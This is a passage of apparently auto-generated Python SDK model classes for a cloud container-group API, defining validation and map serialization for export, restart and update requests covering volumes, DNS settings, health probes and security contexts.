self.sysctls.append(temp_model)
else:
self.sysctls = None
return self
class ExportContainerGroupTemplateResponseTemplateSpec(TeaModel):
def __init__(self, restart_policy=None, dns_policy=None, volumes=None, init_containers=None, containers=None, dns_config=None, security_context=None):
self.restart_policy = restart_policy
self.dns_policy = dns_policy
self.volumes = []
self.init_containers = []
self.containers = []
self.dns_config = dns_config
self.security_context = security_context
def validate(self):
self.validate_required(self.restart_policy, 'restart_policy')
self.validate_required(self.dns_policy, 'dns_policy')
self.validate_required(self.volumes, 'volumes')
if self.volumes:
for k in self.volumes:
if k :
k.validate()
self.validate_required(self.init_containers, 'init_containers')
if self.init_containers:
for k in self.init_containers:
if k :
k.validate()
self.validate_required(self.containers, 'containers')
if self.containers:
for k in self.containers:
if k :
k.validate()
self.validate_required(self.dns_config, 'dns_config')
if self.dns_config:
self.dns_config.validate()
self.validate_required(self.security_context, 'security_context')
if self.security_context:
self.security_context.validate()
def to_map(self):
result = {}
result['RestartPolicy'] = self.restart_policy
result['DnsPolicy'] = self.dns_policy
result['Volumes'] = []
if self.volumes is not None:
for k in self.volumes:
result['Volumes'].append(k.to_map() if k else None)
else:
result['Volumes'] = None
result['InitContainers'] = []
if self.init_containers is not None:
for k in self.init_containers:
result['InitContainers'].append(k.to_map() if k else None)
else:
result['InitContainers'] = None
result['Containers'] = []
if self.containers is not None:
for k in self.containers:
result['Containers'].append(k.to_map() if k else None)
else:
result['Containers'] = None
if self.dns_config is not None:
result['DnsConfig'] = self.dns_config.to_map()
else:
result['DnsConfig'] = None
if self.security_context is not None:
result['SecurityContext'] = self.security_context.to_map()
else:
result['SecurityContext'] = None
return result
def from_map(self, map={}):
self.restart_policy = map.get('RestartPolicy')
self.dns_policy = map.get('DnsPolicy')
self.volumes = []
if map.get('Volumes') is not None:
for k in map.get('Volumes'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecVolumes()
temp_model = temp_model.from_map(k)
self.volumes.append(temp_model)
else:
self.volumes = None
self.init_containers = []
if map.get('InitContainers') is not None:
for k in map.get('InitContainers'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainers()
temp_model = temp_model.from_map(k)
self.init_containers.append(temp_model)
else:
self.init_containers = None
self.containers = []
if map.get('Containers') is not None:
for k in map.get('Containers'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainers()
temp_model = temp_model.from_map(k)
self.containers.append(temp_model)
else:
self.containers = None
if map.get('DnsConfig') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecDnsConfig()
self.dns_config = temp_model.from_map(map['DnsConfig'])
else:
self.dns_config = None
if map.get('SecurityContext') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecSecurityContext()
self.security_context = temp_model.from_map(map['SecurityContext'])
else:
self.security_context = None
return self
class ExportContainerGroupTemplateResponseTemplate(TeaModel):
def __init__(self, region_id=None, zone_id=None, security_group_id=None, v_switch_id=None, resource_group_id=None, eip_instance_id=None, container_group_name=None, instance_type=None, tags=None, resources=None, spec=None):
self.region_id = region_id
self.zone_id = zone_id
self.security_group_id = security_group_id
self.v_switch_id = v_switch_id
self.resource_group_id = resource_group_id
self.eip_instance_id = eip_instance_id
self.container_group_name = container_group_name
self.instance_type = instance_type
self.tags = []
self.resources = resources
self.spec = spec
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.zone_id, 'zone_id')
self.validate_required(self.security_group_id, 'security_group_id')
self.validate_required(self.v_switch_id, 'v_switch_id')
self.validate_required(self.resource_group_id, 'resource_group_id')
self.validate_required(self.eip_instance_id, 'eip_instance_id')
self.validate_required(self.container_group_name, 'container_group_name')
self.validate_required(self.instance_type, 'instance_type')
self.validate_required(self.tags, 'tags')
if self.tags:
for k in self.tags:
if k :
k.validate()
self.validate_required(self.resources, 'resources')
if self.resources:
self.resources.validate()
self.validate_required(self.spec, 'spec')
if self.spec:
self.spec.validate()
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ZoneId'] = self.zone_id
result['SecurityGroupId'] = self.security_group_id
result['VSwitchId'] = self.v_switch_id
result['ResourceGroupId'] = self.resource_group_id
result['EipInstanceId'] = self.eip_instance_id
result['ContainerGroupName'] = self.container_group_name
result['InstanceType'] = self.instance_type
result['Tags'] = []
if self.tags is not None:
for k in self.tags:
result['Tags'].append(k.to_map() if k else None)
else:
result['Tags'] = None
if self.resources is not None:
result['Resources'] = self.resources.to_map()
else:
result['Resources'] = None
if self.spec is not None:
result['Spec'] = self.spec.to_map()
else:
result['Spec'] = None
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.zone_id = map.get('ZoneId')
self.security_group_id = map.get('SecurityGroupId')
self.v_switch_id = map.get('VSwitchId')
self.resource_group_id = map.get('ResourceGroupId')
self.eip_instance_id = map.get('EipInstanceId')
self.container_group_name = map.get('ContainerGroupName')
self.instance_type = map.get('InstanceType')
self.tags = []
if map.get('Tags') is not None:
for k in map.get('Tags'):
temp_model = ExportContainerGroupTemplateResponseTemplateTags()
temp_model = temp_model.from_map(k)
self.tags.append(temp_model)
else:
self.tags = None
if map.get('Resources') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateResources()
self.resources = temp_model.from_map(map['Resources'])
else:
self.resources = None
if map.get('Spec') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpec()
self.spec = temp_model.from_map(map['Spec'])
else:
self.spec = None
return self
class RestartContainerGroupRequest(TeaModel):
def __init__(self, region_id=None, container_group_id=None, client_token=None):
self.region_id = region_id
self.container_group_id = container_group_id
self.client_token = client_token
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.container_group_id, 'container_group_id')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ContainerGroupId'] = self.container_group_id
result['ClientToken'] = self.client_token
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.container_group_id = map.get('ContainerGroupId')
self.client_token = map.get('ClientToken')
return self
class RestartContainerGroupResponse(TeaModel):
def __init__(self, request_id=None):
self.request_id = request_id
def validate(self):
self.validate_required(self.request_id, 'request_id')
def to_map(self):
result = {}
result['RequestId'] = self.request_id
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
return self
class UpdateContainerGroupRequest(TeaModel):
def __init__(self, region_id=None, container_group_id=None, restart_policy=None, tag=None, volume=None, dns_config=None, container=None, init_container=None, image_registry_credential=None, client_token=None, cpu=None, memory=None):
self.region_id = region_id
self.container_group_id = container_group_id
self.restart_policy = restart_policy
self.tag = []
self.volume = []
self.dns_config = dns_config
self.container = []
self.init_container = []
self.image_registry_credential = []
self.client_token = client_token
self.cpu = cpu
self.memory = memory
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.container_group_id, 'container_group_id')
if self.tag:
for k in self.tag:
if k :
k.validate()
if self.volume:
for k in self.volume:
if k :
k.validate()
self.validate_required(self.dns_config, 'dns_config')
if self.dns_config:
self.dns_config.validate()
if self.container:
for k in self.container:
if k :
k.validate()
if self.init_container:
for k in self.init_container:
if k :
k.validate()
if self.image_registry_credential:
for k in self.image_registry_credential:
if k :
k.validate()
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ContainerGroupId'] = self.container_group_id
result['RestartPolicy'] = self.restart_policy
result['Tag'] = []
if self.tag is not None:
for k in self.tag:
result['Tag'].append(k.to_map() if k else None)
else:
result['Tag'] = None
result['Volume'] = []
if self.volume is not None:
for k in self.volume:
result['Volume'].append(k.to_map() if k else None)
else:
result['Volume'] = None
if self.dns_config is not None:
result['DnsConfig'] = self.dns_config.to_map()
else:
result['DnsConfig'] = None
result['Container'] = []
if self.container is not None:
for k in self.container:
result['Container'].append(k.to_map() if k else None)
else:
result['Container'] = None
result['InitContainer'] = []
if self.init_container is not None:
for k in self.init_container:
result['InitContainer'].append(k.to_map() if k else None)
else:
result['InitContainer'] = None
result['ImageRegistryCredential'] = []
if self.image_registry_credential is not None:
for k in self.image_registry_credential:
result['ImageRegistryCredential'].append(k.to_map() if k else None)
else:
result['ImageRegistryCredential'] = None
result['ClientToken'] = self.client_token
result['Cpu'] = self.cpu
result['Memory'] = self.memory
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.container_group_id = map.get('ContainerGroupId')
self.restart_policy = map.get('RestartPolicy')
self.tag = []
if map.get('Tag') is not None:
for k in map.get('Tag'):
temp_model = UpdateContainerGroupRequestTag()
temp_model = temp_model.from_map(k)
self.tag.append(temp_model)
else:
self.tag = None
self.volume = []
if map.get('Volume') is not None:
for k in map.get('Volume'):
temp_model = UpdateContainerGroupRequestVolume()
temp_model = temp_model.from_map(k)
self.volume.append(temp_model)
else:
self.volume = None
if map.get('DnsConfig') is not None:
temp_model = UpdateContainerGroupRequestDnsConfig()
self.dns_config = temp_model.from_map(map['DnsConfig'])
else:
self.dns_config = None
self.container = []
if map.get('Container') is not None:
for k in map.get('Container'):
temp_model = UpdateContainerGroupRequestContainer()
temp_model = temp_model.from_map(k)
self.container.append(temp_model)
else:
self.container = None
self.init_container = []
if map.get('InitContainer') is not None:
for k in map.get('InitContainer'):
temp_model = UpdateContainerGroupRequestInitContainer()
temp_model = temp_model.from_map(k)
self.init_container.append(temp_model)
else:
self.init_container = None
self.image_registry_credential = []
if map.get('ImageRegistryCredential') is not None:
for k in map.get('ImageRegistryCredential'):
temp_model = UpdateContainerGroupRequestImageRegistryCredential()
temp_model = temp_model.from_map(k)
self.image_registry_credential.append(temp_model)
else:
self.image_registry_credential = None
self.client_token = map.get('ClientToken')
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
return self
class UpdateContainerGroupRequestTag(TeaModel):
def __init__(self, key=None, value=None):
self.key = key
self.value = value
def validate(self):
pass
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
return self
class UpdateContainerGroupRequestVolumeNFSVolume(TeaModel):
def __init__(self, server=None, path=None, read_only=None):
self.server = server
self.path = path
self.read_only = read_only
def validate(self):
pass
def to_map(self):
result = {}
result['Server'] = self.server
result['Path'] = self.path
result['ReadOnly'] = self.read_only
return result
def from_map(self, map={}):
self.server = map.get('Server')
self.path = map.get('Path')
self.read_only = map.get('ReadOnly')
return self
class UpdateContainerGroupRequestVolumeConfigFileVolumeConfigFileToPath(TeaModel):
def __init__(self, content=None, path=None):
self.content = content
self.path = path
def validate(self):
pass
def to_map(self):
result = {}
result['Content'] = self.content
result['Path'] = self.path
return result
def from_map(self, map={}):
self.content = map.get('Content')
self.path = map.get('Path')
return self
class UpdateContainerGroupRequestVolumeConfigFileVolume(TeaModel):
def __init__(self, config_file_to_path=None):
self.config_file_to_path = []
def validate(self):
self.validate_required(self.config_file_to_path, 'config_file_to_path')
if self.config_file_to_path:
for k in self.config_file_to_path:
if k :
k.validate()
def to_map(self):
result = {}
result['ConfigFileToPath'] = []
if self.config_file_to_path is not None:
for k in self.config_file_to_path:
result['ConfigFileToPath'].append(k.to_map() if k else None)
else:
result['ConfigFileToPath'] = None
return result
def from_map(self, map={}):
self.config_file_to_path = []
if map.get('ConfigFileToPath') is not None:
for k in map.get('ConfigFileToPath'):
temp_model = UpdateContainerGroupRequestVolumeConfigFileVolumeConfigFileToPath()
temp_model = temp_model.from_map(k)
self.config_file_to_path.append(temp_model)
else:
self.config_file_to_path = None
return self
class UpdateContainerGroupRequestVolumeEmptyDirVolume(TeaModel):
def __init__(self, medium=None):
self.medium = medium
def validate(self):
pass
def to_map(self):
result = {}
result['Medium'] = self.medium
return result
def from_map(self, map={}):
self.medium = map.get('Medium')
return self
class UpdateContainerGroupRequestVolume(TeaModel):
def __init__(self, name=None, type=None, nfsvolume=None, config_file_volume=None, empty_dir_volume=None):
self.name = name
self.type = type
self.nfsvolume = nfsvolume
self.config_file_volume = config_file_volume
self.empty_dir_volume = empty_dir_volume
def validate(self):
self.validate_required(self.nfsvolume, 'nfsvolume')
if self.nfsvolume:
self.nfsvolume.validate()
self.validate_required(self.config_file_volume, 'config_file_volume')
if self.config_file_volume:
self.config_file_volume.validate()
self.validate_required(self.empty_dir_volume, 'empty_dir_volume')
if self.empty_dir_volume:
self.empty_dir_volume.validate()
def to_map(self):
result = {}
result['Name'] = self.name
result['Type'] = self.type
if self.nfsvolume is not None:
result['NFSVolume'] = self.nfsvolume.to_map()
else:
result['NFSVolume'] = None
if self.config_file_volume is not None:
result['ConfigFileVolume'] = self.config_file_volume.to_map()
else:
result['ConfigFileVolume'] = None
if self.empty_dir_volume is not None:
result['EmptyDirVolume'] = self.empty_dir_volume.to_map()
else:
result['EmptyDirVolume'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.type = map.get('Type')
if map.get('NFSVolume') is not None:
temp_model = UpdateContainerGroupRequestVolumeNFSVolume()
self.nfsvolume = temp_model.from_map(map['NFSVolume'])
else:
self.nfsvolume = None
if map.get('ConfigFileVolume') is not None:
temp_model = UpdateContainerGroupRequestVolumeConfigFileVolume()
self.config_file_volume = temp_model.from_map(map['ConfigFileVolume'])
else:
self.config_file_volume = None
if map.get('EmptyDirVolume') is not None:
temp_model = UpdateContainerGroupRequestVolumeEmptyDirVolume()
self.empty_dir_volume = temp_model.from_map(map['EmptyDirVolume'])
else:
self.empty_dir_volume = None
return self
class UpdateContainerGroupRequestDnsConfigOption(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
pass
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class UpdateContainerGroupRequestDnsConfig(TeaModel):
def __init__(self, name_server=None, search=None, option=None):
self.name_server = []
self.search = []
self.option = []
def validate(self):
if self.option:
for k in self.option:
if k :
k.validate()
def to_map(self):
result = {}
result['NameServer'] = []
if self.name_server is not None:
for k in self.name_server:
result['NameServer'].append(k)
else:
result['NameServer'] = None
result['Search'] = []
if self.search is not None:
for k in self.search:
result['Search'].append(k)
else:
result['Search'] = None
result['Option'] = []
if self.option is not None:
for k in self.option:
result['Option'].append(k.to_map() if k else None)
else:
result['Option'] = None
return result
def from_map(self, map={}):
self.name_server = []
if map.get('NameServer') is not None:
for k in map.get('NameServer'):
self.name_server.append(k)
else:
self.name_server = None
self.search = []
if map.get('Search') is not None:
for k in map.get('Search'):
self.search.append(k)
else:
self.search = None
self.option = []
if map.get('Option') is not None:
for k in map.get('Option'):
temp_model = UpdateContainerGroupRequestDnsConfigOption()
temp_model = temp_model.from_map(k)
self.option.append(temp_model)
else:
self.option = None
return self
class UpdateContainerGroupRequestContainerEnvironmentVar(TeaModel):
def __init__(self, key=None, value=None):
self.key = key
self.value = value
def validate(self):
pass
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
return self
class UpdateContainerGroupRequestContainerPort(TeaModel):
def __init__(self, protocol=None, port=None):
self.protocol = protocol
self.port = port
def validate(self):
pass
def to_map(self):
result = {}
result['Protocol'] = self.protocol
result['Port'] = self.port
return result
def from_map(self, map={}):
self.protocol = map.get('Protocol')
self.port = map.get('Port')
return self
class UpdateContainerGroupRequestContainerVolumeMount(TeaModel):
def __init__(self, name=None, mount_path=None, sub_path=None, read_only=None):
self.name = name
self.mount_path = mount_path
self.sub_path = sub_path
self.read_only = read_only
def validate(self):
pass
def to_map(self):
result = {}
result['Name'] = self.name
result['MountPath'] = self.mount_path
result['SubPath'] = self.sub_path
result['ReadOnly'] = self.read_only
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.mount_path = map.get('MountPath')
self.sub_path = map.get('SubPath')
self.read_only = map.get('ReadOnly')
return self
class UpdateContainerGroupRequestContainerReadinessProbeTcpSocket(TeaModel):
def __init__(self, port=None):
self.port = port
def validate(self):
pass
def to_map(self):
result = {}
result['Port'] = self.port
return result
def from_map(self, map={}):
self.port = map.get('Port')
return self
class UpdateContainerGroupRequestContainerReadinessProbeExec(TeaModel):
def __init__(self, command=None):
self.command = []
def validate(self):
self.validate_required(self.command, 'command')
def to_map(self):
result = {}
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
return result
def from_map(self, map={}):
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
return self
class UpdateContainerGroupRequestContainerReadinessProbeHttpGet(TeaModel):
def __init__(self, path=None, port=None, scheme=None):
self.path = path
self.port = port
self.scheme = scheme
def validate(self):
pass
def to_map(self):
result = {}
result['Path'] = self.path
result['Port'] = self.port
result['Scheme'] = self.scheme
return result
def from_map(self, map={}):
self.path = map.get('Path')
self.port = map.get('Port')
self.scheme = map.get('Scheme')
return self
class UpdateContainerGroupRequestContainerReadinessProbe(TeaModel):
def __init__(self, tcp_socket=None, exec=None, http_get=None, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None):
self.tcp_socket = tcp_socket
self.exec = exec
self.http_get = http_get
self.initial_delay_seconds = initial_delay_seconds
self.period_seconds = period_seconds
self.success_threshold = success_threshold
self.failure_threshold = failure_threshold
self.timeout_seconds = timeout_seconds
def validate(self):
self.validate_required(self.tcp_socket, 'tcp_socket')
if self.tcp_socket:
self.tcp_socket.validate()
self.validate_required(self.exec, 'exec')
if self.exec:
self.exec.validate()
self.validate_required(self.http_get, 'http_get')
if self.http_get:
self.http_get.validate()
def to_map(self):
result = {}
if self.tcp_socket is not None:
result['TcpSocket'] = self.tcp_socket.to_map()
else:
result['TcpSocket'] = None
if self.exec is not None:
result['Exec'] = self.exec.to_map()
else:
result['Exec'] = None
if self.http_get is not None:
result['HttpGet'] = self.http_get.to_map()
else:
result['HttpGet'] = None
result['InitialDelaySeconds'] = self.initial_delay_seconds
result['PeriodSeconds'] = self.period_seconds
result['SuccessThreshold'] = self.success_threshold
result['FailureThreshold'] = self.failure_threshold
result['TimeoutSeconds'] = self.timeout_seconds
return result
def from_map(self, map={}):
if map.get('TcpSocket') is not None:
temp_model = UpdateContainerGroupRequestContainerReadinessProbeTcpSocket()
self.tcp_socket = temp_model.from_map(map['TcpSocket'])
else:
self.tcp_socket = None
if map.get('Exec') is not None:
temp_model = UpdateContainerGroupRequestContainerReadinessProbeExec()
self.exec = temp_model.from_map(map['Exec'])
else:
self.exec = None
if map.get('HttpGet') is not None:
temp_model = UpdateContainerGroupRequestContainerReadinessProbeHttpGet()
self.http_get = temp_model.from_map(map['HttpGet'])
else:
self.http_get = None
self.initial_delay_seconds = map.get('InitialDelaySeconds')
self.period_seconds = map.get('PeriodSeconds')
self.success_threshold = map.get('SuccessThreshold')
self.failure_threshold = map.get('FailureThreshold')
self.timeout_seconds = map.get('TimeoutSeconds')
return self
class UpdateContainerGroupRequestContainerLivenessProbeTcpSocket(TeaModel):
def __init__(self, port=None):
self.port = port
def validate(self):
pass
def to_map(self):
result = {}
result['Port'] = self.port
return result
def from_map(self, map={}):
self.port = map.get('Port')
return self
class UpdateContainerGroupRequestContainerLivenessProbeExec(TeaModel):
def __init__(self, command=None):
self.command = []
def validate(self):
self.validate_required(self.command, 'command')
def to_map(self):
result = {}
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
return result
def from_map(self, map={}):
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
return self
class UpdateContainerGroupRequestContainerLivenessProbeHttpGet(TeaModel):
def __init__(self, path=None, port=None, scheme=None):
self.path = path
self.port = port
self.scheme = scheme
def validate(self):
pass
def to_map(self):
result = {}
result['Path'] = self.path
result['Port'] = self.port
result['Scheme'] = self.scheme
return result
def from_map(self, map={}):
self.path = map.get('Path')
self.port = map.get('Port')
self.scheme = map.get('Scheme')
return self
class UpdateContainerGroupRequestContainerLivenessProbe(TeaModel):
def __init__(self, tcp_socket=None, exec=None, http_get=None, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None):
self.tcp_socket = tcp_socket
self.exec = exec
self.http_get = http_get
self.initial_delay_seconds = initial_delay_seconds
self.period_seconds = period_seconds
self.success_threshold = success_threshold
self.failure_threshold = failure_threshold
self.timeout_seconds = timeout_seconds
def validate(self):
self.validate_required(self.tcp_socket, 'tcp_socket')
if self.tcp_socket:
self.tcp_socket.validate()
self.validate_required(self.exec, 'exec')
if self.exec:
self.exec.validate()
self.validate_required(self.http_get, 'http_get')
if self.http_get:
self.http_get.validate()
self.validate_required(self.failure_threshold, 'failure_threshold')
def to_map(self):
result = {}
if self.tcp_socket is not None:
result['TcpSocket'] = self.tcp_socket.to_map()
else:
result['TcpSocket'] = None
if self.exec is not None:
result['Exec'] = self.exec.to_map()
else:
result['Exec'] = None
if self.http_get is not None:
result['HttpGet'] = self.http_get.to_map()
else:
result['HttpGet'] = None
result['InitialDelaySeconds'] = self.initial_delay_seconds
result['PeriodSeconds'] = self.period_seconds
result['SuccessThreshold'] = self.success_threshold
result['FailureThreshold'] = self.failure_threshold
result['TimeoutSeconds'] = self.timeout_seconds
return result
def from_map(self, map={}):
if map.get('TcpSocket') is not None:
temp_model = UpdateContainerGroupRequestContainerLivenessProbeTcpSocket()
self.tcp_socket = temp_model.from_map(map['TcpSocket'])
else:
self.tcp_socket = None
if map.get('Exec') is not None:
temp_model = UpdateContainerGroupRequestContainerLivenessProbeExec()
self.exec = temp_model.from_map(map['Exec'])
else:
self.exec = None
if map.get('HttpGet') is not None:
temp_model = UpdateContainerGroupRequestContainerLivenessProbeHttpGet()
self.http_get = temp_model.from_map(map['HttpGet'])
else:
self.http_get = None
self.initial_delay_seconds = map.get('InitialDelaySeconds')
self.period_seconds = map.get('PeriodSeconds')
self.success_threshold = map.get('SuccessThreshold')
self.failure_threshold = map.get('FailureThreshold')
self.timeout_seconds = map.get('TimeoutSeconds')
return self
class UpdateContainerGroupRequestContainerSecurityContextCapability(TeaModel):
def __init__(self, add=None):
self.add = []
def validate(self):
self.validate_required(self.add, 'add')
def to_map(self):
result = {}
result['Add'] = []
if self.add is not None:
for k in self.add:
result['Add'].append(k)
else:
result['Add'] = None
return result
def from_map(self, map={}):
self.add = []
if map.get('Add') is not None:
for k in map.get('Add'):
self.add.append(k)
else:
self.add = None
return self
class UpdateContainerGroupRequestContainerSecurityContext(TeaModel):
def __init__(self, read_only_root_filesystem=None, run_as_user=None, capability=None):
self.read_only_root_filesystem = read_only_root_filesystem
self.run_as_user = run_as_user
self.capability = capability
def validate(self):
self.validate_required(self.capability, 'capability')
if self.capability:
self.capability.validate()
def to_map(self):
result = {}
result['ReadOnlyRootFilesystem'] = self.read_only_root_filesystem
result['RunAsUser'] = self.run_as_user
if self.capability is not None:
result['Capability'] = self.capability.to_map()
else:
result['Capability'] = None
return result
def from_map(self, map={}):
self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
self.run_as_user = map.get('RunAsUser')
if map.get('Capability') is not None:
temp_model = UpdateContainerGroupRequestContainerSecurityContextCapability()
self.capability = temp_model.from_map(map['Capability'])
else:
self.capability = None
return self
class UpdateContainerGroupRequestContainer(TeaModel):
def __init__(self, name=None, image=None, cpu=None, memory=None, working_dir=None, image_pull_policy=None, stdin=None, stdin_once=None, tty=None, command=None, arg=None, environment_var=None, port=None, volume_mount=None, readiness_probe=None, liveness_probe=None, security_context=None, gpu=None):
self.name = name
self.image = image
self.cpu = cpu
self.memory = memory
self.working_dir = working_dir
self.image_pull_policy = image_pull_policy
self.stdin = stdin
self.stdin_once = stdin_once
self.tty = tty
self.command = []
self.arg = []
self.environment_var = []
self.port = []
self.volume_mount = []
self.readiness_probe = readiness_probe
self.liveness_probe = liveness_probe
self.security_context = security_context
self.gpu = gpu
def validate(self):
self.validate_required(self.command, 'command')
self.validate_required(self.arg, 'arg')
self.validate_required(self.environment_var, 'environment_var')
if self.environment_var:
for k in self.environment_var:
if k :
k.validate()
self.validate_required(self.port, 'port')
if self.port:
for k in self.port:
if k :
k.validate()
self.validate_required(self.volume_mount, 'volume_mount')
if self.volume_mount:
for k in self.volume_mount:
if k :
k.validate()
self.validate_required(self.readiness_probe, 'readiness_probe')
if self.readiness_probe:
self.readiness_probe.validate()
self.validate_required(self.liveness_probe, 'liveness_probe')
if self.liveness_probe:
self.liveness_probe.validate()
self.validate_required(self.security_context, 'security_context')
if self.security_context:
self.security_context.validate()
def to_map(self):
result = {}
result['Name'] = self.name
result['Image'] = self.image
result['Cpu'] = self.cpu
result['Memory'] = self.memory
result['WorkingDir'] = self.working_dir
result['ImagePullPolicy'] = self.image_pull_policy
result['Stdin'] = self.stdin
result['StdinOnce'] = self.stdin_once
result['Tty'] = self.tty
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
result['Arg'] = []
if self.arg is not None:
for k in self.arg:
result['Arg'].append(k)
else:
result['Arg'] = None
result['EnvironmentVar'] = []
if self.environment_var is not None:
for k in self.environment_var:
result['EnvironmentVar'].append(k.to_map() if k else None)
else:
result['EnvironmentVar'] = None
result['Port'] = []
if self.port is not None:
for k in self.port:
result['Port'].append(k.to_map() if k else None)
else:
result['Port'] = None
result['VolumeMount'] = []
if self.volume_mount is not None:
for k in self.volume_mount:
result['VolumeMount'].append(k.to_map() if k else None)
else:
result['VolumeMount'] = None
if self.readiness_probe is not None:
result['ReadinessProbe'] = self.readiness_probe.to_map()
else:
result['ReadinessProbe'] = None
if self.liveness_probe is not None:
result['LivenessProbe'] = self.liveness_probe.to_map()
else:
result['LivenessProbe'] = None
if self.security_context is not None:
result['SecurityContext'] = self.security_context.to_map()
else:
result['SecurityContext'] = None
result['Gpu'] = self.gpu
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.image = map.get('Image')
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
self.working_dir = map.get('WorkingDir')
self.image_pull_policy = map.get('ImagePullPolicy')
self.stdin = map.get('Stdin')
self.stdin_once = map.get('StdinOnce')
self.tty = map.get('Tty')
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
self.arg = []
if map.get('Arg') is not None:
for k in map.get('Arg'):
self.arg.append(k)
else:
self.arg = None
self.environment_var = []
if map.get('EnvironmentVar') is not None:
for k in map.get('EnvironmentVar'):
temp_model = UpdateContainerGroupRequestContainerEnvironmentVar()
temp_model = temp_model.from_map(k)
self.environment_var.append(temp_model)
else:
self.environment_var = None
self.port = []
if map.get('Port') is not None:
for k in map.get('Port'):
temp_model = UpdateContainerGroupRequestContainerPort()
temp_model = temp_model.from_map(k)
self.port.append(temp_model)
else:
self.port = None
self.volume_mount = []
if map.get('VolumeMount') is not None:
for k in map.get('VolumeMount'):
temp_model = UpdateContainerGroupRequestContainerVolumeMount()
temp_model = temp_model.from_map(k)
self.volume_mount.append(temp_model)
else:
self.volume_mount = None
if map.get('ReadinessProbe') is not None:
temp_model = UpdateContainerGroupRequestContainerReadinessProbe()
self.readiness_probe = temp_model.from_map(map['ReadinessProbe'])
else:
self.readiness_probe = None
if map.get('LivenessProbe') is not None:
temp_model = UpdateContainerGroupRequestContainerLivenessProbe()
self.liveness_probe = temp_model.from_map(map['LivenessProbe'])
else:
self.liveness_probe = None
if map.get('SecurityContext') is not None:
temp_model = UpdateContainerGroupRequestContainerSecurityContext()
self.security_context = temp_model.from_map(map['SecurityContext'])
else:
self.security_context = None
self.gpu = map.get('Gpu')
return self
class UpdateContainerGroupRequestInitContainerEnvironmentVar(TeaModel):
def __init__(self, key=None, value=None):
self.key = key
self.value = value
def validate(self):
pass
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
return self
class UpdateContainerGroupRequestInitContainerPort(TeaModel):
def __init__(self, port=None, protocol=None):
self.port = port
self.protocol = protocol
def validate(self):
self.validate_required(self.protocol, 'protocol')
def to_map(self):
result = {}
result['Port'] = self.port
result['Protocol'] = self.protocol
return result
def from_map(self, map={}):
self.port = map.get('Port')
self.protocol = map.get('Protocol')
return self
class UpdateContainerGroupRequestInitContainerVolumeMount(TeaModel):
def __init__(self, name=None, mount_path=None, sub_path=None, read_only=None):
self.name = name
self.mount_path = mount_path
self.sub_path = sub_path
self.read_only = read_only
def validate(self):
pass
def to_map(self):
result = {}
result['Name'] = self.name
result['MountPath'] = self.mount_path
result['SubPath'] = self.sub_path
result['ReadOnly'] = self.read_only
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.mount_path = map.get('MountPath')
self.sub_path = map.get('SubPath')
self.read_only = map.get('ReadOnly')
return self
class UpdateContainerGroupRequestInitContainerSecurityContextCapability(TeaModel):
def __init__(self, add=None):
self.add = []
def validate(self):
self.validate_required(self.add, 'add')
def to_map(self):
result = {}
result['Add'] = []
if self.add is not None:
for k in self.add:
result['Add'].append(k)
else:
result['Add'] = None
return result
def from_map(self, map={}):
self.add = []
if map.get('Add') is not None:
for k in map.get('Add'):
self.add.append(k)
else:
self.add = None
return self
class UpdateContainerGroupRequestInitContainerSecurityContext(TeaModel):
def __init__(self, read_only_root_filesystem=None, run_as_user=None, capability=None):
self.read_only_root_filesystem = read_only_root_filesystem
self.run_as_user = run_as_user
self.capability = capability
def validate(self):
self.validate_required(self.capability, 'capability')
if self.capability:
self.capability.validate()
def to_map(self):
result = {}
result['ReadOnlyRootFilesystem'] = self.read_only_root_filesystem
result['RunAsUser'] = self.run_as_user
if self.capability is not None:
result['Capability'] = self.capability.to_map()
else:
result['Capability'] = None
return result
def from_map(self, map={}):
self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
self.run_as_user = map.get('RunAsUser')
if map.get('Capability') is not None:
